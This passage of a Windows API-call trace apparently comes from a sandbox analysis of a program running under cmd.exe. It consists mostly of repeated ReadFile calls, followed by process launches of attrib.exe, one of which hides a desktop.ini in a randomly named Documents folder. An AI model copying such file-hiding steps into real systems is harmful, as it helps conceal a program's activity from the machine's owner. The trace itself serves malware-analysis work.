lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.724] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 
[0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.725] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, 
lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 
lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.726] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: 
lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.727] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, 
lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.728] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.729] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.752] _close (_FileHandle=4) returned 0 [0133.752] FindNextFileW (in: hFindFile=0x3be6b8, lpFindFileData=0x2ef248 | out: lpFindFileData=0x2ef248) returned 0 [0133.753] GetLastError () returned 0x12 [0133.753] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.753] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.756] _close (_FileHandle=3) returned 0 [0133.757] GetConsoleTitleW (in: lpConsoleTitle=0x2ef680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0133.757] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.757] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.757] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.758] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.758] GetLastError () returned 0x2 [0133.758] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.758] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.758] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 
[0133.759] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.759] GetConsoleTitleW (in: lpConsoleTitle=0x2ef414, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.759] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef29c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef364 | out: lpAttributeList=0x2ef29c, lpSize=0x2ef364) returned 1 [0133.759] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef29c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef35c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef29c, lpPreviousValue=0x0) returned 1 [0133.759] GetStartupInfoW (in: lpStartupInfo=0x2ef258 | out: lpStartupInfo=0x2ef258*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.759] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.759] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef344 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", 
lpProcessInformation=0x2ef344*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb38, dwThreadId=0xb34)) returned 1 [0133.761] CloseHandle (hObject=0x50) returned 1 [0133.761] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.761] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.761] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.761] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0133.810] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef238 | out: lpExitCode=0x2ef238*=0x0) returned 1 [0133.810] CloseHandle (hObject=0x4c) returned 1 [0133.810] _vsnwprintf (in: _Buffer=0x2ef380, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef244 | out: _Buffer="00000000") returned 8 [0133.810] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.810] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.810] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.810] GetEnvironmentStringsW () returned 0x3c2dd0* [0133.810] FreeEnvironmentStringsW (penv=0x3c2dd0) returned 1 [0133.810] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef29c | out: lpAttributeList=0x2ef29c) [0133.811] GetConsoleTitleW (in: lpConsoleTitle=0x2ef680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.811] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.811] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.811] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.811] GetLastError () returned 0x2 [0133.811] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.811] GetLastError () returned 0x2 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.812] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0xffffffff [0133.812] GetLastError () returned 0x2 [0133.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef1c) returned 0x3be6b8 [0133.812] FindClose (in: hFindFile=0x3be6b8 | out: hFindFile=0x3be6b8) returned 1 [0133.812] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.812] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.812] GetConsoleTitleW (in: lpConsoleTitle=0x2ef414, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.812] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef29c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef364 | out: lpAttributeList=0x2ef29c, lpSize=0x2ef364) returned 1 [0133.812] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef29c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef35c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef29c, 
